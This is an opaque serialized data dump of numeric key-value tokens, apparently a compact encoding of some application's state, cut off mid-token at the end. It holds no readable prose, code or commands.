- ..'|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:460|14:461|3:2177|15:21|4:423|17:24|18:24|5:460|5:460;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:2178|15:996|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:2179|15:325|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:2180|15:325|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:2181|15:996|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:2182|15:325|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:2183|15:996|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:2184|15:996|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|3:2185|15:1218|4:442|17:24|18:24;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:2186|15:325|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:2187|15:325|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:460|14:461|3:2188|15:21|4:423|17:24|18:24|5:460|5:460;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:2189|15:325|4:327|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;7|1:450;p;1|1:421|2:2|5:19|3:2190|15:996|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:2191|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:460|14:461|3:2192|15:153|4:423|17:24|18:24|5:460|5:460;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:2193|15:553|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:2194|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:42'
- ..'4;p;1|1:421|2:2|5:19|3:2195|15:996|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:2196|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|3:2197|15:537|4:442|17:24|18:24;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:2198|15:996|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:2199|15:996|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:460|3:2200|15:325|4:560|17:24|18:24|5:460|5:460;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;7|1:450;p;1|1:421|2:2|5:19|3:2201|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:2202|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:2203|15:153|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:2204|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;7|1:450;p;1|1:421|2:2|5:19|3:2205|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:2206|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:2207|15:153|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:2208|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:2209|15:153|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:2210|15:325|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|3:2211|15:1218|4:442|17:24|18:24;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:2212|15:435|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:2213|15:325|4:327|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:460'
- ..'|14:461|3:2214|15:21|4:423|17:24|18:24|5:460|5:460;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|3:2215|4:455|17:24|18:24;n;3|5:438|4:6|6:7|7:8|8:9|5:438|5:438;p;1|1:421|2:2|5:19|3:2216|15:325|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:2217|15:445|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|3:2218|4:437|17:24|18:24;n;3|5:438|4:6|6:7|7:8|8:9|5:438|5:438;p;1|1:421|2:2|5:19|3:2219|15:325|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;7|1:450;p;1|1:421|2:2|5:19|3:2220|15:325|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:2221|15:325|4:327|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|3:2222|15:441|4:442|17:24|18:24;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:460|14:461|3:2223|15:21|4:423|17:24|18:24|5:460|5:460;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:2224|15:325|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:2225|15:325|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:2226|15:325|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:2227|15:325|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:2228|15:325|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:2229|15:325|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:2230|15:325|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:2231|15:325|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:2232|15:325|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19'
- ..'|3:2233|15:325|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:2234|15:325|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:2235|15:325|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:2236|15:325|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|2:2|3:2237|4:15;n;3|5:5|4:6|6:7|7:8|8:9|5:5|5:5;4|9:428|10:2238;p;1|2:2|3:2239|15:996|4:15;n;4|9:468|10:2240;p;1|2:2|3:2241|15:21|4:467;n;4|9:468|10:2242;p;1|1:421|2:2|5:19|3:2243|15:325|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:2244|15:325|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:2245|15:325|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:2246|15:325|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|3:2247|15:457|4:442|17:24|18:24;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:2248|15:325|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:2249|15:325|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:460|14:461|3:2250|15:21|4:423|17:24|18:24|5:460|5:460;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;7|1:450;p;1|1:421|2:2|5:19|3:2251|15:325|4:327|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|3:2252|4:437|17:24|18:24;n;3|5:438|4:6|6:7|7:8|8:9|5:438|5:438;p;1|1:421|2:2|5:19|3:2253|15:435|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|2:2|3:2254|15:996|4:4;n;3|5:5|4:6|6:7|7:8|8:9|5:5|5:5;p;1|1:421|2:2|5:19|3:2255|15:325|4:327|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|3:2256|4:455|17:24|18:24;n;3|5:438|4:6|6:7|7:8|8:9|5:438|5:438;p;1|1:421|2:'
- ..'2|5:19|3:2257|15:325|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:2258|15:325|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:2259|15:325|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:460|14:461|3:2260|15:21|4:423|17:24|18:24|5:460|5:460;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:2261|15:445|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:2262|15:325|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|3:2263|15:441|4:442|17:24|18:24;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:2264|15:325|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:2265|15:325|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:2266|15:325|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;2;n;1|2:2|5:131|14:395|3:2267|15:1285|4:398|5:131|5:131;n;4|9:141|10:399;p;1|2:2|5:131|14:395|3:2268|15:1287|4:398|5:131|5:131;n;4|9:141|10:402;p;1|1:403|2:2|5:404|3:2269|15:1289|4:407|18:24|5:404|5:404;n;14|1:408;n;7|1:409;n;7|1:410;p;8|1:411;7|1:412;p;p;1|2:2|5:131|14:395|3:2270|15:1285|4:414|5:131|5:131;n;4|9:141|10:2271;p;1|2:2|5:131|14:395|3:2272|15:1287|4:398|5:131|5:131;n;4|9:141|10:417;p;1|2:2|5:131|14:395|3:2273|15:1285|4:419|18:24|5:131|5:131;7|1:420;p;1|2:2|3:2274|15:996|4:4;n;3|5:5|4:6|6:7|7:8|8:9|5:5|5:5;4|9:192|10:2275;4|9:192|10:2276;4|9:192|10:2277;4|9:192|10:2278;p;2|1:765;n;2|1:16;n;2|1:17;n;1|1:18|5:19|14:2|3:2279|15:153|16:22|4:23|17:24|18:25|5:19|5:19;n;5|3:26|19:27;6|20:27;7;8|1:28;9|9:10|10:2280;9|9:10|10:2281;9|9:10|10:2282;p;10|5:32|3:2283|15:153|16:1300|4:35|17:25|18:24|5:32|5:32;n;9|9:192|10:2284;p;1|1:36|5:37|3:2285|15:153|16:1302|4:40|17:24|21:25'
- ..'|18:24|5:37|5:37;n;11|22:41|23:42|24:43;9|9:10|10:44;p;7;12|1:45|25:46;12|1:45|25:46;12|1:45|25:47;12|1:45|25:48;12|1:45|25:49;12|1:45|25:50;12|1:45|25:51;12|1:45|25:52;12|1:45|25:53;12|1:45|25:54;1|1:55|5:37|3:2286|15:153|16:1304|4:40|17:24|26:25|18:24|5:37|5:37;n;11|22:41|23:42|24:43;p;12|1:45|25:58;12|1:45|25:59;12|1:45|25:60;12|1:45|25:61;12|1:45|25:62;12|1:45|25:63;12|1:45|25:64;12|1:45|25:65;12|1:45|25:66;12|1:45|25:67;12|1:45|25:68;12|1:45|25:67;12|1:45|25:69;1|1:70|5:37|3:2287|15:153|16:1306|4:40|17:24|26:25|18:24|5:37|5:37;n;11|22:41|23:42|24:43;p;1|1:73|5:37|3:2288|15:153|16:1308|4:40|17:24|26:25|18:24|5:37|5:37;n;11|22:41|23:42|24:43;p;12|1:45|25:76;12|1:45|25:77;12|1:45|25:78;12|1:45|25:79;12|1:45|25:80;12|1:45|25:81;12|1:45|25:82;12|1:45|25:81;1|1:83|5:84|3:2289|15:153|16:1310|4:87|17:24|5:84|5:84;n;7;p;12|1:45|25:89;12|1:45|25:90;12|1:45|25:91;12|1:45|25:92;12|1:45|25:93;12|1:45|25:94;12|1:45|25:95;12|1:45|25:96;12|1:45|25:97;12|1:45|25:98;12|1:45|25:99;12|1:45|25:100;12|1:45|25:101;12|1:45|25:102;12|1:45|25:103;12|1:45|25:104;12|1:45|25:105;12|1:45|25:106;12|1:45|25:107;12|1:45|25:108;12|1:45|25:109;p;7;8|1:110;8|1:111;2|1:112;n;1|1:113|5:32|3:2290|15:297|16:1313|4:117|27:25|17:24|18:25|5:32|5:32;n;11|22:118|24:25;p;1|1:113|5:84|3:2291|15:153|16:1316|4:123|27:25|17:25|18:25|5:84|5:84;n;11|22:118|24:25;9|9:237|10:796;p;1|1:113|5:32|3:2292|15:153|16:1319|4:128|27:25|17:25|18:24|5:32|5:32;n;11|22:118|24:129;13|28:130|29:24;9|9:178|10:253;9|9:158|10:1320;9|9:237|10:799;9|9:391|10:1364;p;1|1:113|5:131|3:2293|15:1322|16:1323|4:135|17:25|18:25|5:131|5:131;n;11;9|9:223|10:1372;9|9:804|10:1324;p;1|1:113|5:19|3:2294|15:150|16:1326|4:139|27:25|17:24|18:25|5:19|5:19;n;11|22:118|24:25;9|9:141|10:143;p;1|1:113|5:19|3:2295|15:150|16:1329|4:146|27:25|17:24|18:25|5:19|5:19;n;11|22:118|24:25;9|9:119|10:2296;p;1|1:113|5:32|3:2297|15:297|16:1331|4:117|27'
- ..':25|17:24|18:25|5:32|5:32;n;11|22:118|24:25;p;1|1:113|5:19|3:2298|15:137|16:1333|4:139|27:25|17:24|18:24|5:19|5:19;n;11|22:118|24:129;9|9:119|10:2299;9|9:252|10:251;p;1|1:113|5:84|3:2300|15:21|16:1336|4:155|17:24|26:25|18:24|5:84|5:84;n;11|22:156|24:157;9|9:160|10:165;9|9:158|10:159;9|9:158|10:1342;9|9:162|10:2301;9|9:158|10:2302;p;1|1:113|5:9|3:2303|15:137|16:1346|4:168|27:25|17:25|18:25|5:9|5:9;n;11|22:118|24:25;9|9:171|10:1535;9|9:171|10:172;p;1|1:113|5:19|3:2304|15:137|16:1348|4:175|17:25|18:24|5:19|5:19;n;11|22:118|24:129;p;1|1:113|5:9|3:2305|15:137|16:1351|4:182|27:25|17:25|18:25|5:9|5:9;n;11|22:118|24:25;9|9:185|10:125;9|9:158|10:184;9|9:176|10:2306;9|9:158|10:2307;p;1|1:113|5:131|30:187|3:2308|15:1322|16:1353|4:190|17:25|18:25|5:131|5:131;n;11|22:191;p;1|1:113|5:131|3:2309|15:325|16:1356|4:196|31:7|17:24|26:25|18:24|5:131|5:131;n;11|22:197|24:157;9|9:158|10:199;9|9:158|10:1357;9|9:158|10:202;p;1|1:113|5:32|3:2310|15:153|16:1361|4:128|27:25|17:25|18:24|5:32|5:32;n;11|22:118|24:129;13|28:205|29:157;9|9:178|10:253;9|9:391|10:1364;p;1|1:113|5:84|3:2311|15:370|16:1366|4:209|17:25|18:25|5:84|5:84;n;11|22:210|24:129;p;1|5:19|3:2312|15:297|16:1369|4:213|17:24|18:214|5:19|5:19;1|1:113|5:131|3:2313|15:1322|16:1371|4:135|17:25|18:25|5:131|5:131;n;11;9|9:223|10:1372;9|9:804|10:1324;9|9:221|10:2314;p;1|1:113|5:131|30:187|3:2315|15:1322|16:1374|4:190|17:25|18:25|5:131|5:131;n;11|22:191;9|9:221|10:227;p;1|1:113|5:84|3:2316|15:370|16:1376|4:209|17:25|18:25|5:84|5:84;n;11|22:210|24:129;9|9:256|10:323;p;1|1:113|5:131|3:2317|15:325|16:1379|4:196|31:7|17:24|26:25|18:24|5:131|5:131;n;11|22:197|24:157;9|9:158|10:1643;p;1|5:19|3:2318|15:297|16:1383|4:234|17:24|18:24|5:19|5:19;n;9|9:124|10:1385;p;1|1:113|5:19|3:2319|15:153|16:1388|4:123|27:25|17:25|18:25|5:19|5:19;n;11|22:118|24:25;p;1|1:113|5:19|3:2320|15:281|16:1391|4:139|27:25|17:24|18:25|5:19|5:19;n;11|22:118|2'
- ..'4:25;9|9:141|10:1647;9|9:119|10:1648;9|9:141|10:244;p;1|1:113|5:84|3:2321|15:297|16:1393|4:247|27:25|17:157|18:25|5:84|5:84;n;11|24:25;9|9:260|10:1561;9|9:256|10:1394;9|9:124|10:248;4|9:258|10:259;p;1|1:113|5:19|3:2322|15:150|16:1396|4:139|27:25|17:24|18:24|5:19|5:19;n;11|22:118|24:129;p;1|1:113|3:2323|15:297|16:1398|4:247|27:25|17:157|18:25;n;11|24:25;9|9:260|10:261;9|9:124|10:248;4|9:258|10:259;p;1|5:84|3:2324|15:153|16:1401|4:264|31:7|17:24|32:25|18:25|5:84|5:84;n;9|9:268|10:1656;9|9:265|10:266;9|9:10|10:267;p;1|5:32|3:2325|15:21|16:1404|4:274|31:7|18:24|5:32|5:32;n;9|9:265|10:2326;p;1|5:19|3:2327|15:297|16:1406|4:213|17:24|18:214|5:19|5:19;1|1:113|5:9|3:2328|15:242|16:1409|4:168|27:25|17:25|18:25|5:9|5:9;n;11|22:118|24:25;9|9:171|10:1570;9|9:169|10:1572;9|9:171|10:2329;p;1|1:113|5:84|3:2330|15:153|16:1411|4:155|17:24|26:25|18:24|5:84|5:84;n;11|22:156|24:157;9|9:158|10:290;9|9:160|10:295;9|9:162|10:2331;9|9:158|10:1412;9|9:160|10:1413;9|9:158|10:289;9|9:158|10:293;9|9:162|10:286;9|9:160|10:294;9|9:158|10:1414;p;1|1:113|5:19|3:2332|15:115|16:1416|4:299|27:25|17:157|26:25|18:25|5:19|5:19;n;11|24:25;9|9:217|10:302;9|9:306|10:1417;9|9:217|10:301;9|9:217|10:1419;9|9:308|10:1420;4|9:303|10:304;p;1|1:113|5:32|3:2333|15:153|16:1422|4:312|27:25|18:25|5:32|5:32;n;11|24:25;p;1|5:19|3:2334|15:297|16:1424|4:234|17:24|18:24|5:19|5:19;1|1:113|5:84|3:2335|15:370|16:1428|4:209|17:25|18:25|5:84|5:84;n;11|22:210|24:129;9|9:256|10:323;9|9:258|10:1429;p;1|1:113|5:19|3:2336|16:1431|4:196|31:7|17:24|18:24|5:19|5:19;n;11|22:327|24:157;9|9:391|10:1432;p;1|1:113|5:19|3:2337|15:150|16:1434|4:175|27:25|17:25|18:24|5:19|5:19;n;11|22:118|24:129;9|9:391|10:179;9|9:178|10:266;p;1|1:113|5:19|3:2338|15:281|16:1436|4:146|27:25|17:24|18:25|5:19|5:19;n;11|22:118|24:25;p;1|1:113|5:19|3:2339|16:1439|4:335|31:7|27:25|18:25|5:19|5:19;n;11|24:25;p;1|1:113|5:32|3:2340|15:153|16:1443|4:312'
- ..'|27:25|18:25|5:32|5:32;n;11|24:25;9|9:306|10:2341;p;1|1:113|5:84|3:2342|15:370|16:1445|4:344|31:7|17:157|18:25|5:84|5:84;n;11|24:25;9|9:345|10:1446;9|9:252|10:1447;p;1|5:19|3:2343|15:153|16:1450|4:349|31:7|5:19|5:19;n;9|9:158|10:2344;4|9:350|10:2345;4|9:353|10:354;p;1|1:113|5:84|3:2346|15:370|16:1452|4:209|17:25|18:25|5:84|5:84;n;11|22:210|24:129;9|9:256|10:323;9|9:258|10:2347;p;1|1:113|5:19|3:2348|15:115|16:1454|4:299|27:25|17:157|21:25|18:25|5:19|5:19;n;11|24:25;9|9:306|10:1417;9|9:904|10:1591;9|9:308|10:1455;9|9:904|10:1679;9|9:904|10:2349;4|9:303|10:304;9|9:904|10:1456;p;1|1:113|5:9|3:2350|15:242|16:1458|4:182|27:25|17:25|18:25|5:9|5:9;n;11|22:118|24:25;p;1|1:113|5:19|3:2351|15:325|16:1463|4:335|31:7|27:25|18:25|5:19|5:19;n;11|24:25;9|9:119|10:368;9|9:119|10:1466;9|9:119|10:367;p;1|1:113|5:84|3:2352|15:207|16:1468|4:344|31:7|17:157|18:25|5:84|5:84;n;11|24:25;9|9:372|10:1469;p;1|5:19|3:2353|15:153|16:1472|4:349|31:7|5:19|5:19;n;9|9:162|10:1473;4|9:350|10:1685;4|9:353|10:379;p;1|1:113|5:380|30:187|14:381|3:2354|16:1475|4:384|31:7|18:24|5:380|5:380;n;11|22:385|24:157;9|9:391|10:1476;p;1|1:113|5:32|3:2355|16:1478|4:388|31:7|17:24|18:24|5:32|5:32;n;11|22:389|24:157;9|9:391|10:392;p;p;p;p;1|2:2|3:2356|15:153|4:467;n;4|9:468|10:469;4|9:428|10:470;p;1|1:1780|2:2|3:2357|15:2358|4:1783;1|1:1780|2:2|3:2359|15:2360|4:1783;1|1:1780|2:2|3:2361|15:2362|4:1783;1|1:1780|2:2|3:2363|15:2364|4:1783;1|1:1780|2:2|5:32|3:2365|15:2366|4:2367|17:24|18:24|5:32|5:32;n;11|22:2368|24:157;p;1|1:1780|2:2|3:2369|15:2370|4:1783;1|1:1780|2:2|3:2371|15:2372|4:1783;1|1:1780|2:2|3:2373|15:2374|4:1783;1|1:1780|2:2|3:2375|4:2376|17:24|18:24;n;15;p;1|1:1780|2:2|3:2377|4:2378|17:24|18:24;n;15;p;1|1:1780|2:2|3:2379|4:2380|17:24|18:24;1|1:1780|2:2|3:2381|15:21|4:2380|17:24|18:24;1|1:1780|2:2|3:2382|4:2376|17:24|18:24;n;15;p;1|1:1780|2:2|3:2383|15:2384|4:1783;1|1:1780|2:2|3:2385|15:2386|4'
- ..':1783;1|1:1780|2:2|3:2385|15:2387|4:1783;1|1:1780|2:2|3:2388|15:2389|4:1783;1|1:1780|2:2|3:2385|15:2390|4:1783;1|1:1780|2:2|3:2385|15:2391|4:1783;1|1:1780|2:2|3:2392|15:2393|4:1783;1|1:1780|2:2|3:2394|15:2395|4:1783;1|1:1780|2:2|3:2396|15:2397|4:1783;1|1:1780|2:2|3:2385|15:2398|4:1783;1|1:1780|2:2|3:2385|15:2399|4:1783;1|1:1780|2:2|3:2400|15:2401|4:1783;1|1:1780|2:2|3:2385|15:2402|4:1783;1|1:1780|2:2|3:2403|15:325|4:2380|17:24|18:24;1|1:1780|2:2|3:2404|15:2405|4:1783;1|1:1780|2:2|3:2406|15:2407|4:1783;1|1:1780|2:2|3:2408|15:2409|4:1783;1|1:1780|2:2|3:2410|15:2411|4:1783;1|1:1780|2:2|3:2385|15:2412|4:1783;1|1:1780|2:2|3:2413|15:2414|4:1783;1|1:1780|2:2|3:2415|15:2416|4:1783;1|1:1780|2:2|3:2385|15:2417|4:1783;1|1:1780|2:2|3:2385|15:2418|4:1783;1|1:1780|2:2|3:2385|15:2419|4:1783;1|1:1780|2:2|3:2420|15:2421|4:1783;1|1:1780|2:2|3:2422|15:2423|4:1783;1|1:1780|2:2|3:2385|15:2424|4:1783;1|1:1780|2:2|3:2425|15:2426|4:1783;1|1:1780|2:2|3:2385|15:2427|4:1783;1|1:1780|2:2|3:2428|15:2429|4:2376|17:24|18:24;n;16;p;1|1:1780|2:2|3:2430|15:2431|4:1783;1|1:1780|2:2|3:2432|15:2433|4:2376|17:24|18:24;n;16;p;1|1:1780|2:2|3:2434|15:325|4:2435|17:24|18:24;n;16;p;1|1:1780|2:2|3:2436|15:325|4:2437|17:24|18:24;n;16;p;1|1:1780|2:2|3:2438|15:325|4:2437|17:24|18:24;n;16;p;1|1:1780|2:2|3:2439|15:325|4:2437|17:24|18:24;n;16;p;1|1:1780|2:2|3:2440|4:2378|17:24|18:24;n;15;9|9:345|10:2441;p;1|1:1780|2:2|3:2442|15:2443|4:1783;1|1:1780|2:2|3:2444|15:325|4:2435|17:24|18:24;n;16;p;1|1:1780|2:2|3:2445|15:2446|4:2376|17:24|18:24;n;16;p;1|1:1780|2:2|3:2447|15:2448|4:1783;1|1:1780|2:2|3:2449|15:2450|4:1783;1|1:1780|2:2|3:2451|15:2452|4:1783;1|1:1780|2:2|3:2453|15:2454|4:2376|17:24|18:24;n;16;p;1|1:1780|2:2|3:2455|15:2456|4:1783;1|1:1780|2:2|3:2457|15:325|4:2437|17:24|18:24;n;16;p;1|1:421|2:2|3:2458|15:537|4:1857|17:24|18:24;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:1780|2:2|3:2459|15:246'
- ..'0|4:1783;1|1:1780|2:2|3:2385|15:2461|4:1783;1|1:1780|2:2|3:2462|15:2463|4:1783;1|1:1780|2:2|3:2385|15:2464|4:1783;1|1:1780|2:2|3:2385|15:2465|4:1783;1|1:1780|2:2|3:2385|15:2466|4:1783;1|1:1780|2:2|3:2467|15:2468|4:1783;1|1:1780|2:2|3:2385|15:2469|4:1783;1|1:1780|2:2|3:2470|15:2471|4:1783;1|1:1780|2:2|3:2472|15:2473|4:1783;1|1:1780|2:2|3:2385|15:2474|4:1783;1|1:1780|2:2|3:2385|15:2475|4:1783;1|1:1780|2:2|3:2385|15:2476|4:1783;1|1:1780|2:2|3:2477|15:2478|4:1783;1|1:1780|2:2|3:2385|15:2479|4:1783;1|1:1780|2:2|3:2480|15:2481|4:1783;1|1:1780|2:2|3:2482|15:2483|4:1783;1|1:1780|2:2|3:2484|15:2485|4:1783;1|1:1780|2:2|3:2385|15:2486|4:1783;1|1:1780|2:2|3:2487|15:2488|4:1783;1|1:1780|2:2|3:2385|15:2489|4:1783;1|1:1780|2:2|3:2385|15:2490|4:1783;1|1:1780|2:2|3:2385|15:2491|4:1783;1|1:1780|2:2|3:2385|15:2492|4:1783;1|1:1780|2:2|3:2493|15:2494|4:1783;1|1:1780|2:2|3:2495|15:2496|4:1783;1|1:1780|2:2|3:2497|15:2498|4:1783;1|1:1780|2:2|3:2499|15:2500|4:1783;1|1:1780|2:2|3:2385|15:2501|4:1783;1|1:1780|2:2|3:2385|15:2502|4:1783;1|5:1848|14:395|3:2503|15:2504|16:2505|4:1852|5:1848|5:1848;1|1:1780|2:2|3:2506|15:21|4:2507|36:24|17:24|18:24;1|1:1780|2:2|3:2508|15:2509|4:1783;1|1:1780|2:2|3:2385|15:2510|4:1783;1|1:1780|2:2|3:2511|15:2512|4:2367|17:24|18:24;n;16|37:2504|22:2513;p;1|1:1780|2:2|3:2514|15:2515|4:1783;1|1:1780|2:2|3:2516|15:21|4:2380|17:24|18:24;1|1:1780|2:2|3:2517|4:2376|17:24|18:24;n;15;p;1|1:421|2:2|3:2518|15:2519|4:1870|17:24|18:24;n;3|5:438|4:6|6:7|7:8|8:9|5:438|5:438;p;1|1:178